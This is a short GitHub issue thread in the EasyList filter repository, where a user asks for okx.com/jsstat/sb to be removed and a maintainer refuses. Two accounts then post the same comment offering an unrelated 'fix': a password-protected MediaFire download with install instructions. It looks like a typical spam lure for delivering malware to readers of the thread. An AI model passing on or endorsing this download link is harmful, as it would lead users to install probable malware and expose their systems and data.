### ISSUE TITLE
Request to remove okx.com/jsstat/sb from the list

### ISSUE THREAD

**Issue by tinafangkunding** [easylist/easylist#19882]
List the website(s) you're having issues with:

oklink.com/jsstat
okx.com/jsstat/sb? 

Please help to remove the following domain/api from the list

**Comment by Khrin** [comment]
absolutely not

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
